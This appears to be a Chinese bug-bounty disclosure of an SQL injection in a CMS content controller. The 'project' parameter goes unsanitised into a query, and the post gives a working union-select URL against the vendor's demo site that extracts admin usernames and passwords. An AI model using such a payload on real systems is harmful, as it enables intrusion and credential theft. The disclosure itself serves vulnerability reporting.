一枚注入直接出数据非盲注。就用官方给的演示站做测试。不知道你们有没有小礼物呢? 详细说明:/app/controller/contentController.php class contentController extends Controller{ private $content; public function __construct(){ $this->content=M("module")->content($_GET['project'],$_GET['id']); } public function index(){ $_GET['classid']=$this->content['classid']; return $this->display($this->content['template'],$this->content); } } 将$_get[project]带入content方法。进去看看: public function content($table,$id){ $arr=D($table)->where('id="'.$id.'"')->getone(); 直接将$table带入SQL语句。 我就不继续跟了,看漏洞证明吧。 官方给的测试站做验证: http://guf521656.h163.92hezu.org/?controller=content&project=single%20where%201=2%20union%20select%2001,concat(admin,0x23,password),3,0x73696E676C652E68746D6C,5,6,7,8,9,10,11%20from%20f_manage%23 得到数据:
修复方案:送小礼物我就提供帮助哦~ |
-
上一篇: 网御星云第二集某重要业务系统爆出SQL注入Orac
下一篇: URP通杀第二弹(短小精悍的小题目) - 网站安全
还没有人抢沙发呢~